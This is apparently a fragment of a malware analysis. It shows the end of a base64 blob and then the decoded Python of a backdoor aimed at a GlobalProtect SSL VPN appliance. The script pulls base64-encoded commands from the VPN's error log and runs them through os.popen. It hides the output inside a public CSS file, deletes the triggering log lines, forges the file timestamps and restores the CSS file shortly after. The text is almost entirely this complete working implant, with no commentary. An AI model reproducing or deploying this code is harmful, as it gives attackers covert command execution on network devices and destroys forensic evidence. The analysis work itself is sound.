0Og0KICAgICAgICAgICAgcGFzcw0KICAgICAgICB0aW1lLnNsZWVwKDIpDQoNCg0KaW1wb3J0IHRocmVhZGluZyx0aW1lDQp0aHJlYWRpbmcuVGhyZWFkKHRhcmdldD1fX21haW4pLnN0YXJ0KCkNCg0K"
## The base64 decoding result is as follows
```
def __main():
import threading,time,os,re,base64
def restore(css_path,content,atime,mtime):
import os,time
time.sleep(15)
with open(css_path,'w') as f:
f.write(content)
os.utime(css_path,(atime,mtime))
def __is_whole_hour():
from datetime import datetime
current_time = datetime.now().time()
return current_time.minute != 0 and current_time.second == 0
css_path = '/var/appweb/sslvpndocs/global-protect/portal/css/bootstrap.min.css'
content = open(css_path).read()
atime=os.path.getatime(css_path)
mtime=os.path.getmtime(css_path)
while True:
try:
SHELL_PATTERN = 'img\[([a-zA-Z0-9+/=]+)\]'
lines = []
WRITE_FLAG = False
for line in open("/var/log/pan/sslvpn_ngx_error.log",errors="ignore").readlines():
rst = re.search(SHELL_PATTERN,line)
if rst:
WRITE_FLAG = True
cmd = base64.b64decode(rst.group(1)).decode()
try:
output = os.popen(cmd).read()
with open(css_path,"a") as f:
f.write("/*"+output+"*/")
except Exception as e:
pass
continue
lines.append(line)
if WRITE_FLAG:
atime=os.path.getatime("/var/log/pan/sslvpn_ngx_error.log")
mtime=os.path.getmtime("/var/log/pan/sslvpn_ngx_error.log")
with open("/var/log/pan/sslvpn_ngx_error.log","w") as f:
f.writelines(lines)
os.utime("/var/log/pan/sslvpn_ngx_error.log",(atime,mtime))
import threading
threading.Thread(target=restore,args=(css_path,content,atime,mtime)).start()
except:
pass
time.sleep(2)
import threading,time
threading.Thread(target=__main).start()
```